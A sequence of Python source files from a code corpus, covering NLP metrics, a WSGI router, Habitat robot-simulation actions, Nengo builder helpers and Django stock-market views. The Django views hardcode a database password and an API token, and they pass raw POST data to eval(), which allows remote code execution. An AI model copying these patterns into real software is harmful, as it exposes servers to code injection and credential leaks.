word_norm_op_predictions in zip(\n self.example_ids.tolist(),\n self.word_segmentation_predictions.tolist(),\n self.word_norm_op_predictions.tolist(),\n ):\n example = self.dataset.examples[example_id]\n gold_document = self.dataset.doc_id2document[example.doc_id]\n predicted_document = Document.from_jumanpp(gold_document.to_jumanpp())\n predicted_document.doc_id = gold_document.doc_id\n\n assert (\n len(example.encoding.input_ids) == len(word_segmentation_predictions) == len(word_norm_op_predictions)\n )\n word_segmentation_tags, word_norm_op_tags = convert_predictions_into_tags(\n word_segmentation_predictions, word_norm_op_predictions, example.encoding.input_ids, special_ids\n )\n set_morphemes(predicted_document, word_segmentation_tags, word_norm_op_tags)\n\n orig_doc_id = to_orig_doc_id(gold_document.doc_id)\n for sentence in extract_target_sentences(predicted_document):\n doc_id2predicted_sentences[orig_doc_id].append(sentence)\n for sentence in extract_target_sentences(gold_document):\n doc_id2gold_sentences[orig_doc_id].append(sentence)\n predicted_documents = self._convert_doc_id2sentences_into_documents(doc_id2predicted_sentences)\n gold_documents = self._convert_doc_id2sentences_into_documents(doc_id2gold_sentences)\n return predicted_documents, gold_documents\n\n @staticmethod\n def _convert_doc_id2sentences_into_documents(doc_id2sentences: Dict[str, List[Sentence]]) -> List[Document]:\n # Build documents that do not have clauses, phrases, or base phrases, but morphemes only\n return [Document.from_jumanpp(\"\".join(s.to_jumanpp() for s in ss)) for ss in doc_id2sentences.values()]\n\n def compute_word_segmentation_metrics(\n self, predicted_documents: List[Document], gold_documents: List[Document]\n ) -> Dict[str, float]:\n labels = [self._convert_document_into_segmentation_tags(d) for d in gold_documents]\n predictions = [self._convert_document_into_segmentation_tags(d) for d in predicted_documents]\n return {\n \"word_segmentation_accuracy\": accuracy_score(y_true=labels, y_pred=predictions),\n \"word_segmentation_f1\": f1_score(y_true=labels, y_pred=predictions, mode=\"strict\", scheme=IOB2).item(),\n }\n\n @staticmethod\n def _convert_document_into_segmentation_tags(document: Document) -> List[str]:\n segmentation_tags = []\n for morpheme in document.morphemes:\n segmentation_tags.extend([\"B\"] + [\"I\"] * (len(morpheme.text) - 1))\n return segmentation_tags\n\n @staticmethod\n def compute_word_normalization_metrics(predictions: torch.Tensor, labels: torch.Tensor) -> Dict[str, float]:\n ignored_indices = labels.eq(IGNORE_INDEX)\n predictions = predictions[~ignored_indices]\n labels = labels[~ignored_indices]\n\n metrics: Dict[str, float] = {\n \"word_normalization_accuracy\": accuracy_score(y_true=labels, y_pred=predictions).item()\n }\n\n keep_indices = predictions.eq(WORD_NORM_OP_TAGS.index(\"K\"))\n if (~keep_indices).sum().item() == 0:\n precision = 0.0\n else:\n precision = accuracy_score(y_true=labels[~keep_indices], y_pred=predictions[~keep_indices]).item()\n\n keep_indices = labels.eq(WORD_NORM_OP_TAGS.index(\"K\"))\n if (~keep_indices).sum().item() == 0:\n recall = 0.0\n else:\n recall = accuracy_score(y_true=labels[~keep_indices], y_pred=predictions[~keep_indices]).item()\n\n if (precision + recall) == 0.0:\n f1 = 0.0\n else:\n f1 = (2 * precision * recall) / (precision + recall)\n metrics[\"word_normalization_f1\"] = f1\n\n for word_norm_op_index, word_norm_op_tag in enumerate(WORD_NORM_OP_TAGS):\n indices = predictions.eq(word_norm_op_index)\n if indices.sum().item() == 0:\n precision = 0.0\n else:\n precision = accuracy_score(y_true=labels[indices], y_pred=predictions[indices]).item()\n\n indices = labels.eq(word_norm_op_index)\n if indices.sum().item() == 0:\n recall = 0.0\n else:\n recall = accuracy_score(y_true=labels[indices], y_pred=predictions[indices]).item()\n\n if (precision + recall) == 0.0:\n f1 = 0.0\n else:\n f1 = (2 * precision * recall) / (precision + recall)\n metrics[f\"word_normalization_f1:{word_norm_op_tag}\"] = f1\n return metrics\n","sub_path":"src/kwja/metrics/char.py","file_name":"char.py","file_ext":"py","file_size_in_byte":7396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"247021209","text":"import webob.dec\nfrom webob.exc import HTTPNotFound as HTTPNotFound\nfrom routes.mapper import Mapper\n\n\nclass WsgiHack(webob.dec.wsgify):\n def __call__(self, environ, start_response):\n self.kwargs[\"start_response\"] = start_response\n return super(WsgiHack, self).__call__(environ, start_response)\n\n\nclass WSGIApplication(object):\n def __init__(self):\n super(WSGIApplication, self).__init__()\n self.mapper = Mapper()\n self._match = lambda req: self.mapper.match(environ=req.environ)\n\n @WsgiHack\n def __call__(self, req, start_response):\n match = self._match(req)\n\n if not match:\n return HTTPNotFound()\n\n req.start_response = start_response\n req.urlvars = match\n\n name = match[\"controller\"].__name__\n\n controller = match[\"controller\"](req)\n\n return controller(req)\n\n\nclass BaseController(object):\n def __init__(self, req):\n self.req = req\n\n def __call__(self, req):\n action = self.req.urlvars.get('action', 'index')\n\n kwarg = self.req.urlvars.copy()\n\n return getattr(self, action)(self.req, **kwarg)\n","sub_path":"rest/wsgi_app.py","file_name":"wsgi_app.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"530697338","text":"from arkos import storage\nfrom arkos.system import systemtime\n\n\nclass Share:\n def __init__(self, id, path, expires=0):\n self.id = id\n self.path = path\n self.expires = expires\n self.fetch_count = 0\n\n def add(self):\n storage.files.add(\"shares\", self)\n\n def delete(self):\n storage.files.remove(\"shares\", self)\n\n def is_expired(self):\n return (self.expires != 0 and self.expires < systemtime.get_unix_time())\n\n def update_expiry(self, nexpiry):\n if nexpiry == False:\n self.expires = 0\n else:\n self.expires = systemtime.get_unix_time(nexpiry)\n\n @property\n def as_dict(self):\n return {\n \"id\": self.id,\n \"path\": self.path,\n \"expires\": self.expires != 0,\n \"expires_at\": systemtime.ts_to_datetime(self.expires, \"unix\") if self.expires != 0 else \"\",\n \"fetch_count\": self.fetch_count\n }\n\n @property\n def serialized(self):\n data = self.as_dict\n data[\"expires_at\"] = systemtime.get_iso_time(self.expires, \"unix\") if self.expires != 0 else \"\",\n return data\n\n\ndef get(id=None):\n data = storage.files.get(\"shares\")\n to_purge = []\n for x in data:\n if x.is_expired():\n to_purge.append(x)\n for x in to_purge:\n x.delete()\n if id:\n for x in data:\n if x.id == id:\n return x\n return None\n return data\n","sub_path":"arkos/shared_files.py","file_name":"shared_files.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"109395084","text":"import re\nimport torch\n\nfrom functools import wraps\n\nfrom parameters import SOS_IDX, EOS_IDX, UNK_IDX, PAD_IDX, CUDA\n\n\ndef normalize(x):\n # x = re.sub(\"[\\uAC00-\\uD7A3]+\", \"\\uAC00\", x) £ convert Hangeul to 가\n # x = re.sub(\"[\\u3040-\\u30FF]+\", \"\\u3042\", x) # convert Hiragana and Katakana to あ\n # x = re.sub(\"[\\u4E00-\\u9FFF]+\", \"\\u6F22\", x) # convert CJK unified ideographs to 漢\n x = re.sub(\"\\s+\", \" \", x)\n x = re.sub(\"^ | $\", \"\", x)\n x = x.lower()\n return x\n\n\ndef tokenize(x, unit):\n x = normalize(x)\n if unit == \"char\":\n return re.sub(\" \", \"\", x)\n elif unit == \"word\":\n return x.split(\" \")\n\n\ndef save_data(filename, data):\n with open(filename, \"w\") as outfile:\n for seq in data:\n outfile.write(\" \".join(seq) + \"\\n\")\n\n\ndef load_tkn_to_idx(filename):\n print(\"loading {}\".format(filename))\n tkn_to_idx = {}\n with open(filename) as infile:\n for line in infile:\n line = line[:-1]\n tkn_to_idx[line] = len(tkn_to_idx)\n return tkn_to_idx\n\n\ndef load_idx_to_tkn(filename):\n print(\"loading {}\".format(filename))\n idx_to_tkn = []\n with open(filename) as infile:\n for line in infile:\n line = line[:-1]\n idx_to_tkn.append(line)\n return idx_to_tkn\n\n\ndef save_tkn_to_idx(filename, tkn_to_idx):\n with open(filename, \"w\") as outfile:\n for tkn, _ in sorted(tkn_to_idx.items(), key=lambda x: x[1]):\n outfile.write(\"%s\\n\" % tkn)\n\n\ndef load_checkpoint(filename, model=None):\n print(\"loading {}\".format(filename))\n checkpoint = torch.load(filename)\n if model:\n model.load_state_dict(checkpoint[\"state_dict\"])\n epoch = checkpoint[\"epoch\"]\n loss = checkpoint[\"loss\"]\n print(\"saved model: epoch = {:d}, loss = {:f}\".format(checkpoint[\"epoch\"], checkpoint[\"loss\"]))\n return epoch\n\n\ndef save_checkpoint(filename, model, epoch, loss, time):\n print(\"epoch = {:d}, loss = {:f}, time = {:f}\".format(epoch, loss, time))\n if filename and model:\n print(\"saving {}\".format(filename))\n checkpoint = {\"state_dict\": model.state_dict(), \"epoch\": epoch, \"loss\": loss}\n torch.save(checkpoint, filename + \".epoch%d\" % epoch)\n print(\"saved model at epoch {:d}\".format(epoch))\n\n\ndef cudify(f):\n @wraps(f)\n def cudified(*args):\n x = f(*args)\n return x.cuda() if CUDA else x\n return cudified\n\n\nTensor = cudify(torch.Tensor)\nLongTensor = cudify(torch.LongTensor)\nrandn = cudify(torch.randn)\nzeros = cudify(torch.zeros)\n\n\ndef log_sum_exp(x):\n m = torch.max(x, -1)[0]\n return m + torch.log(torch.sum(torch.exp(x - m.unsqueeze(-1)), -1))\n\n\ndef batchify(xc, xw, minlen=0, sos=True, eos=True):\n xw_len = max(minlen, max(len(x) for x in xw))\n if xc:\n xc_len = max(minlen, max(len(w) for x in xc for w in x))\n pad = [[PAD_IDX] * (xc_len + 2)]\n xc = [[[SOS_IDX] + w + [EOS_IDX] + [PAD_IDX] * (xc_len - len(w)) for w in x] for x in xc]\n xc = [(pad if sos else []) + x + (pad * (xw_len - len(x) + eos)) for x in xc]\n xc = LongTensor(xc)\n sos = [SOS_IDX] if sos else []\n eos = [EOS_IDX] if eos else []\n xw = [sos + list(x) + eos + [PAD_IDX] * (xw_len - len(x)) for x in xw]\n return xc, LongTensor(xw)\n\n\ndef iob_to_txt(x, y, unit):\n out = \"\"\n x = tokenize(x, unit)\n for i, j in enumerate(y):\n if i and j[0] == \"B\":\n out += \" \"\n out += x[i]\n return out\n\n\ndef f1(prec, recall):\n return 2 * prec * recall / (prec + recall) if prec + recall else 0\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"148219035","text":"import time\nimport math\nimport RTCvideo\n\n\nIP = '127.0.0.1'\nRTP_RECV_PORT0 = 5000\nRTCP_RECV_PORT0 = 5001\nRTCP_SEND_PORT0 = 5005\n\n\n\n\n\nvideo=RTCvideo.Video(IP, RTP_RECV_PORT0, RTCP_RECV_PORT0, RTCP_SEND_PORT0)\nvideo.draw_overlay(\"ring.png\", x = 0, y = 0, scale_x = 0.6, scale_y = 0.8)\n\n\nprint(\"I started\")\nvideo.start()\n\ntime.sleep(1000)\n\nvideo.stop()\nprint(\"I stopped\")\n\ntime.sleep(1)\n\nvideo.start()\nprint(\"I started\")\n\ntime.sleep(10)\n\nvideo.paused()\nprint(\"I paused\")\n\ntime.sleep(10)\n\nprint(\"I started\")\nvideo.start()\n\ntime.sleep(10)\n\nvideo.stop()\nprint(\"I stopped\")\n\n\n","sub_path":"Projects/BadProjects/GstreamerVideoOLD/test5.py","file_name":"test5.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"144681281","text":"import attr\nimport numpy as np\nimport sys\nsys.path.append('../habitat-api')\nimport habitat\nimport habitat_sim\nimport habitat_sim.utils\nfrom habitat.sims.habitat_simulator.action_spaces import (\n HabitatSimV1ActionSpaceConfiguration,\n)\nfrom habitat_sim.agent.controls import register_move_fn\nimport magnum as mn\n\n\"\"\"\nRegister Additional Noisy Actions to Habitat-sim\nfor implementation of \"Visual Memory for Robust Path Following\"\n\"\"\"\n\nTHETA = 20 # default : 10\nX = 0.30 # default : 0.25\nSPIN_NOISE = 1 # rad\nFORWARD_NOISE = 0.5 #\nFN_CLIP_RATIO = 0.4\nSN_CLIP_RATIO = 0.4\n\n\n@attr.s(auto_attribs=True, slots=True)\nclass MoveAndSpinSpec:\n forward_amount: float\n spin_amount: float\n noise : bool\n\n\ndef _noisy_move(\n scene_node: habitat_sim.SceneNode,\n forward_amount: float,\n spin_amount: float,\n noise : bool\n):\n forward_ax = (\n np.array(scene_node.absolute_transformation().rotation_scaling())\n @ habitat_sim.geo.FRONT\n )\n forward_noise = np.random.normal(forward_amount, FORWARD_NOISE) if noise else 0\n forward = np.clip(forward_amount + forward_noise, np.maximum(forward_amount - FN_CLIP_RATIO*X,0), forward_amount + FN_CLIP_RATIO*X)\n scene_node.translate_local(forward_ax * forward)\n\n spin_noise = np.random.normal(0, SPIN_NOISE) * 180 / 3.141592 if noise else 0\n spin = np.clip(spin_amount + spin_noise, spin_amount - SN_CLIP_RATIO * THETA, spin_amount + SN_CLIP_RATIO * THETA)\n\n #print('forward : {}, spin : {}'.format(forward,spin))\n # Rotate about the +y (up) axis\n rotation_ax = habitat_sim.geo.UP\n scene_node.rotate_local(mn.Deg(spin), rotation_ax)\n # Calling normalize is needed after rotating to deal with machine precision errors\n scene_node.rotation = scene_node.rotation.normalized()\n\n\n\n@register_move_fn(body_action=True)\nclass NoisyForward(habitat_sim.SceneNodeControl):\n def __call__(\n self,\n scene_node: habitat_sim.SceneNode,\n actuation_spec: MoveAndSpinSpec,\n ):\n #print('noisy forward : {}'.format(actuation_spec.noise))\n _noisy_move(\n scene_node,\n actuation_spec.forward_amount,\n actuation_spec.spin_amount,\n actuation_spec.noise,\n )\n\n\n@register_move_fn(body_action=True)\nclass NoisyLeft(habitat_sim.SceneNodeControl):\n def __call__(\n self,\n scene_node: habitat_sim.SceneNode,\n actuation_spec: MoveAndSpinSpec,\n ):\n #print('noisy left : {}'.format(actuation_spec.noise))\n _noisy_move(\n scene_node,\n actuation_spec.forward_amount,\n actuation_spec.spin_amount,\n actuation_spec.noise,\n )\n\n@register_move_fn(body_action=True)\nclass NoisyRight(habitat_sim.SceneNodeControl):\n def __call__(\n self,\n scene_node: habitat_sim.SceneNode,\n actuation_spec: MoveAndSpinSpec,\n ):\n #print('noisy right : {}'.format(actuation_spec.noise))\n _noisy_move(\n scene_node,\n actuation_spec.forward_amount,\n -actuation_spec.spin_amount,\n actuation_spec.noise,\n )\n\n\n\n\n@habitat.registry.register_action_space_configuration\nclass NoNoisyMove(HabitatSimV1ActionSpaceConfiguration):\n def get(self):\n config = super().get()\n\n config[habitat.SimulatorActions.NOISY_FORWARD] = habitat_sim.ActionSpec(\n \"noisy_forward\",\n MoveAndSpinSpec(X, 0, noise=False)\n )\n config[habitat.SimulatorActions.NOISY_LEFT] = habitat_sim.ActionSpec(\n \"noisy_left\",\n MoveAndSpinSpec(0,THETA,noise=False)\n )\n config[habitat.SimulatorActions.NOISY_RIGHT] = habitat_sim.ActionSpec(\n \"noisy_right\",\n MoveAndSpinSpec(0,THETA,noise=False)\n )\n\n\n return config\n\n\n@habitat.registry.register_action_space_configuration\nclass NoisyMove(HabitatSimV1ActionSpaceConfiguration):\n def get(self):\n config = super().get()\n\n config[habitat.SimulatorActions.NOISY_FORWARD] = habitat_sim.ActionSpec(\n \"noisy_forward\",\n MoveAndSpinSpec(X, 0, noise=True),\n )\n config[habitat.SimulatorActions.NOISY_LEFT] = habitat_sim.ActionSpec(\n \"noisy_left\",\n MoveAndSpinSpec(0,THETA,noise=True),\n )\n config[habitat.SimulatorActions.NOISY_RIGHT] = habitat_sim.ActionSpec(\n \"noisy_right\",\n MoveAndSpinSpec(0,THETA,noise=True),\n )\n\n\n return config\n\n\ndef main():\n habitat.SimulatorActions.extend_action_space(\"NOISY_LEFT\")\n habitat.SimulatorActions.extend_action_space(\"NOISY_RIGHT\")\n habitat.SimulatorActions.extend_action_space(\"NOISY_FORWARD\")\n\n config = habitat.get_config(config_paths=\"../habitat-api/configs/tasks/pointnav.yaml\")\n config.defrost()\n config.SIMULATOR.ACTION_SPACE_CONFIG = \"NoNoisyMove\"\n config.DATASET.DATA_PATH = \"../habitat-api/\" + config.DATASET.DATA_PATH\n config.SIMULATOR.SCENE = '../habitat-api/' + config.SIMULATOR.SCENE\n config.freeze()\n\n env = habitat.Env(config=config)\n env.reset()\n env.step(habitat.SimulatorActions.NOISY_LEFT)\n env.step(habitat.SimulatorActions.NOISY_RIGHT)\n env.step(habitat.SimulatorActions.NOISY_FORWARD)\n env.close()\n\n config.defrost()\n config.SIMULATOR.ACTION_SPACE_CONFIG = \"NoisyMove\"\n config.freeze()\n\n env = habitat.Env(config=config)\n env.reset()\n env.step(habitat.SimulatorActions.NOISY_LEFT)\n env.step(habitat.SimulatorActions.NOISY_RIGHT)\n env.step(habitat.SimulatorActions.NOISY_FORWARD)\n env.close()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"RPF_DAgger/NoisyAction.py","file_name":"NoisyAction.py","file_ext":"py","file_size_in_byte":5605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"588395841","text":"\"\"\"These are helper functions that various backends may find useful for\ngenerating their own Builder system.\n\"\"\"\n\nfrom __future__ import absolute_import\nimport collections\n\nimport numpy as np\n\nimport nengo\n\n\ndef objs_and_connections(network):\n \"\"\"Given a Network, returns all (ensembles + nodes, connections).\"\"\"\n objs = list(network.ensembles + network.nodes)\n connections = list(network.connections)\n for subnetwork in network.networks:\n subobjs, subconnections = objs_and_connections(subnetwork)\n objs.extend(subobjs)\n connections.extend(subconnections)\n return objs, connections\n\n\ndef generate_graphviz(objs, connections):\n \"\"\"Create a .gv file with this set of objects and connections\n\n Parameters\n ----------\n objs : list of Nodes and Ensembles\n All the objects in the model\n connections : list of Connections\n All the Connections in the model\n\n Returns the text contents of the desired .dot file\n\n This can be useful for debugging and testing Builders that manipulate\n the model graph before construction.\n \"\"\"\n text = []\n text.append('digraph G {')\n for obj in objs:\n text.append(' \"%d\" [label=\"%s\"];' % (id(obj), obj.label))\n\n def label(transform):\n # determine the label for a connection based on its transform\n transform = np.asarray(transform)\n if len(transform.shape) == 0:\n return ''\n return '%dx%d' % transform.shape\n\n for c in connections:\n text.append(' \"%d\" -> \"%d\" [label=\"%s\"];' % (\n id(c.pre), id(c.post), label(c.transform_full)))\n text.append('}')\n return '\\n'.join(text)\n\n\ndef remove_passthrough_nodes(objs, connections): # noqa: C901\n \"\"\"Returns a version of the model without passthrough Nodes\n\n For some backends (such as SpiNNaker), it is useful to remove Nodes that\n have 'None' as their output. These nodes simply sum their inputs and\n use that as their output. These nodes are defined purely for organizational\n purposes and should not affect the behaviour of the model. For example,\n the 'input' and 'output' Nodes in an EnsembleArray, which are just meant to\n aggregate data.\n\n Note that removing passthrough nodes can simplify a model and may be useful\n for other backends as well. For example, an EnsembleArray connected to\n another EnsembleArray with an identity matrix as the transform\n should collapse down to D Connections between the corresponding Ensembles\n inside the EnsembleArrays.\n\n Parameters\n ----------\n objs : list of Nodes and Ensembles\n All the objects in the model\n connections : list of Connections\n All the Connections in the model\n\n Returns the objs and connections of the resulting model. The passthrough\n Nodes will be removed, and the Connections that interact with those Nodes\n will be replaced with equivalent Connections that don't interact with those\n Nodes.\n \"\"\"\n\n inputs, outputs = find_all_io(connections)\n result_conn = list(connections)\n result_objs = list(objs)\n\n # look for passthrough Nodes to remove\n for obj in objs:\n if isinstance(obj, nengo.Node) and obj.output is None:\n result_objs.remove(obj)\n\n # get rid of the connections to and from this Node\n for c in inputs[obj]:\n result_conn.remove(c)\n outputs[c.pre].remove(c)\n for c in outputs[obj]:\n result_conn.remove(c)\n inputs[c.post].remove(c)\n\n # replace those connections with equivalent ones\n for c_in in inputs[obj]:\n if c_in.pre is obj:\n raise Exception('Cannot remove a Node with feedback')\n\n for c_out in outputs[obj]:\n c = _create_replacement_connection(c_in, c_out)\n if c is not None:\n result_conn.append(c)\n # put this in the list, since it might be used\n # another time through the loop\n outputs[c.pre].append(c)\n inputs[c.post].append(c)\n\n return result_objs, result_conn\n\n\ndef find_all_io(connections):\n \"\"\"Build up a list of all inputs and outputs for each object\"\"\"\n inputs = collections.defaultdict(list)\n outputs = collections.defaultdict(list)\n for c in connections:\n inputs[c.post].append(c)\n outputs[c.pre].append(c)\n return inputs, outputs\n\n\ndef _create_replacement_connection(c_in, c_out):\n \"\"\"Generate a new Connection to replace two through a passthrough Node\"\"\"\n assert c_in.post is c_out.pre\n assert c_in.post.output is None\n\n # determine the filter for the new Connection\n if c_in.synapse is None:\n synapse = c_out.synapse\n elif c_out.synapse is None:\n synapse = c_in.synapse\n else:\n raise NotImplementedError('Cannot merge two filters')\n # Note: the algorithm below is in the right ballpark,\n # but isn't exactly the same as two low-pass filters\n # filter = c_out.filter + c_in.filter\n\n function = c_in.function\n if c_out.function is not None:\n raise Exception('Cannot remove a Node with a' +\n 'function being computed on it')\n\n # compute the combined transform\n transform = np.dot(c_out.transform_full, c_in.transform_full)\n # check if the transform is 0 (this happens a lot\n # with things like identity transforms)\n if np.all(transform == 0):\n return None\n\n with nengo.Network(): # dummy model so connections don't get added\n args = {}\n if function is not None:\n args['function'] = function\n c = nengo.Connection(c_in.pre, c_out.post,\n synapse=synapse,\n transform=transform, **args)\n return c\n","sub_path":"nengo_alt/nengo/utils/builder.py","file_name":"builder.py","file_ext":"py","file_size_in_byte":5893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"442559987","text":"from django.shortcuts import render\nfrom django.views.decorators.http import require_http_methods\nfrom django.core import serializers\nfrom django.core.serializers import serialize\nfrom django.http import JsonResponse\nfrom rest_framework import viewsets\nfrom django.middleware.csrf import get_token\nimport datetime\nimport time\nfrom dateutil.relativedelta import relativedelta\nimport MySQLdb\nimport pandas as pd\nimport tushare as ts\nimport baostock as bs\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.types import NVARCHAR, Float, Integer\n\nimport json\nimport hashlib\n\nfrom .models import User\nfrom .models import Datastatus\n\n#这个可能需要放入login\nengine_ts = create_engine('mysql://sopython_root:Free0921@127.0.0.1:3306/sopython_aistocks?charset=utf8&use_unicode=1')\ntspro = ts.pro_api('cb01935d73e23f6d59991c576f31534e13659f76be1a94ae403532e3')\n\n'''\nfrom stocks.serializer import UserSerializer\nclass UserViewSet(viewsets.ModelViewSet):\n queryset = User.objects.all()\n serializer_class = UserSerializer\n'''\n\ndef hash_code(s, salt='mypython'):\n h = hashlib.sha256()\n s += salt\n h.update(s.encode())\n return h.hexdigest()\n\n'''\n获取时间戳\n将\"%Y-%m-%d\"格式的日期(如\"2020-11-20\")\n及\"%Y%m%d%H%M%S%f\"格式的时间(如\"20201120202854120\"\n转换为时间戳\n'''\ndef get_timestamp(sdatetime):\n if (len(sdatetime) <= len(\"2020-11-20\")):\n timeArray=time.strptime(sdatetime, \"%Y-%m-%d\")\n else:\n timeArray=time.strptime(sdatetime,\"%Y%m%d%H%M%S%f\")\n\n #print(\"timeArray:\", timeArray)\n timestamp = time.mktime(timeArray) * 1000\n return timestamp\n\n# csrf认证\n@require_http_methods([\"GET\"])\ndef get_csrf(request):\n response = {}\n\n # 生成 csrf 数据,发送给前端\n csrf_token = get_token(request)\n\n #response['Access-Control-Allow-Origin'] = '*'\n\n response['msg'] = 'success'\n response['error_num'] = 0\n response['token'] = csrf_token\n return JsonResponse(response)\n\n# 获取KLine\n@require_http_methods([\"GET\"])\ndef get_kline(request):\n response = {}\n data = {}\n asks = []\n bids = []\n depths = {}\n depths['asks'] = asks\n depths['bids'] = bids\n\n isLogin = False\n #verify if is a valid user\n try:\n username = request.COOKIES[\"user_name\"]\n isLogin = request.COOKIES[\"is_login\"]\n except Exception as e:\n response['msg'] = 'Not a valid user'\n response['error_num'] = 1001\n return JsonResponse(response)\n\n if not (isLogin and (request.session[\"user_name\"] == username)):\n response['msg'] = 'session is closed'\n response['error_num'] = 1001\n return JsonResponse(response)\n\n # get the parameters\n sCode = request.GET[\"sCode\"]\n sFreq = request.GET[\"sFreq\"]\n\n #### 登陆BaoStock系统 ####\n lg = bs.login()\n # 显示登陆返回信息\n if (lg.error_code != '0'):\n #print(type(lg.error_code))\n print('login respond error_code:'+lg.error_code)\n print('login respond error_msg:'+lg.error_msg)\n response['msg'] = lg.error_msg\n response['error_num'] = int(lg.error_code)\n return JsonResponse(response)\n\n #get one year datalist\n one_yrs_ago = datetime.datetime.now() - relativedelta(years=1)\n sStart = one_yrs_ago.strftime('%Y-%m-%d')\n\n #### 获取沪深A股历史K线数据 ####\n # 详细指标参数,参见“历史行情指标参数”章节;“分钟线”参数与“日线”参数不同。“分钟线”不包含指数。\n # 分钟线指标:date,time,code,open,high,low,close,volume,amount,adjustflag\n # 周月线指标:date,code,open,high,low,close,volume,amount,adjustflag,turn,pctChg\n # [\"w\", \"d\", \"60\", \"30\", \"15\", \"5\"]\n if (sFreq in [\"w\", \"d\"]):\n rs = bs.query_history_k_data_plus(sCode, \"date, open,high,low,close,volume\",\n start_date= sStart, frequency= sFreq, adjustflag=\"3\")\n else:\n rs = bs.query_history_k_data_plus(sCode, \"time, open,high,low,close,volume\",\n start_date= sStart, frequency= sFreq, adjustflag=\"3\")\n\n if (rs.error_code != '0'):\n print('query_history_k_data_plus respond error_code:'+rs.error_code)\n print('query_history_k_data_plus respond error_msg:'+rs.error_msg)\n response['msg'] = rs.error_msg\n response['error_num'] = int(rs.error_code)\n return JsonResponse(response)\n\n\n #### 打印结果集 ####\n data_list = []\n while (rs.error_code == '0') & rs.next():\n # 获取一条记录,将记录合并在一起\n arow = rs.get_row_data()\n #print(arow)\n arowset = []\n arowset.append(get_timestamp(arow[0]))\n arowset.append(round(float(arow[1]), 2))\n arowset.append(round(float(arow[2]), 2))\n arowset.append(round(float(arow[3]), 2))\n arowset.append(round(float(arow[4]), 2))\n arowset.append(float(arow[5])/100)\n data_list.append(arowset)\n\n #result = pd.DataFrame(data_list, columns=rs.fields)\n #### 结果集输出到csv文件 ####\n #result.to_csv(\"D:\\\\myTemp\\\\data_\" + sCode + \"_\" + sFreq +\".csv\", index=False)\n #print(result)\n\n #### 登出系统 ####\n bs.logout()\n\n response['msg'] = 'success'\n response['error_num'] = 0\n response['success'] = True\n\n data['depths'] = depths\n data['lines'] = data_list\n\n response['data'] = data\n\n return JsonResponse(response, safe=False)\n\n\n# 获取stocklist\n@require_http_methods([\"GET\"])\ndef get_stocklist(request):\n response = {}\n selectedStocks = []\n\n isLogin = False\n #verify if is a valid user\n try:\n username = request.COOKIES[\"user_name\"]\n isLogin = request.COOKIES[\"is_login\"]\n except Exception as e:\n response['msg'] = 'Not a valid user'\n response['error_num'] = 1001\n return JsonResponse(response)\n\n\n #print(\"cookie name:\" + username + \" session name:\" + request.session[\"user_name\"])\n if not (isLogin and (request.session[\"user_name\"] == username)):\n response['msg'] = 'session is closed'\n response['error_num'] = 1001\n return JsonResponse(response)\n\n #获取自选股信息\n try:\n user = User.objects.get(name=username)\n selectedStocks = user.stocks.split(\";\")\n except :\n response['msg'] = '用户不存在!'\n response['error_num'] = 1001\n return JsonResponse(response)\n\n #check whether the stocklist has been updated this day\n if (Datastatus.objects.count() == 0):\n status = Datastatus()\n status.save()\n\n #如果当天没有更新过,就先更新一下stocklist\n if not (Datastatus.objects.filter(id=1).first().update_date == datetime.date.today()):\n # 从tushare获取数据\n df = tspro.stock_basic(exchange='', list_status='L', fields='symbol,name,area,industry,market,exchange,list_date,is_hs')\n\n #增加id列\n df.insert(0, 'id', range(len(df)))\n\n #增加一列:本股票交易信息最后更新日期\n df['update_date'] = None\n\n #存入mysql表\n res = df.to_sql('stocks_stocklist', engine_ts, index=False, if_exists='replace', chunksize=5000)\n\n #表示当天股票列表已更新\n Datastatus.objects.filter(id=1).update(update_date=datetime.date.today())\n\n #获取stocklist表里的数据返回\n ''' e留着供参考\n datalist = Stocklist.objects.all()\n json_data = serialize('json', datalist) # str\n json_data = json.loads(json_data) # 序列化成json对象\n '''\n\n #get the stocklist from DB\n try:\n conn = MySQLdb.connect(host=\"localhost\", user=\"sopython_root\", passwd=\"Free0921\", db=\"sopython_aistocks\", charset='utf8')\n with conn.cursor(cursorclass=MySQLdb.cursors.DictCursor) as cursor:\n cursor.execute(\"select id, symbol, name, market, exchange from stocks_stocklist\")\n datarows = cursor.fetchall()\n #print(datarows[0], datarows[1])\n\n rows = list(datarows)\n #print(rows[0], rows[1])\n for row in rows:\n if (row['symbol'] in selectedStocks):\n row.update({'selected': 'true', 'btnname':'-', 'hint':'去自选'})\n else:\n row.update({'selected': 'false', 'btnname':'+', 'hint':'加自选'})\n\n #print(row)\n finally:\n conn.close()\n\n response['msg'] = 'success'\n response['error_num'] = 0\n response['datalist'] = rows\n #response['datalist'] = json.loads(serializers.serialize(\"json\", rows))\n\n return JsonResponse(response, safe=False)\n\n# add new user\n@require_http_methods([\"POST\"])\ndef add_user(request):\n response = {}\n message = 'success'\n error_num = 0\n\n #get the string\n dic0 = list(request.POST.keys())\n #print(dic0)\n #get the value pair from the string\n dic = eval(dic0[0])\n\n username = dic.get('name')\n password = dic.get('password')\n email = dic.get('email')\n\n print(password)\n\n sameuser = User.objects.filter(name=username)\n if sameuser:\n message = '用户名已经存在'\n error_num = 1\n elif (User.objects.filter(email=email)):\n message = '该邮箱已经被注册了!'\n error_num = 1\n else:\n try:\n new_user = User()\n new_user.name = username\n\n passcode = hash_code(password)\n #print(\"passcode:\" + passcode)\n new_user.password = passcode\n new_user.email = email\n new_user.stocks = ''\n\n new_user.save()\n message = 'success'\n error_num = 0\n except Exception as e:\n message = str(e)\n error_num = 1\n\n response['msg'] = message\n response['error_num'] = error_num\n return 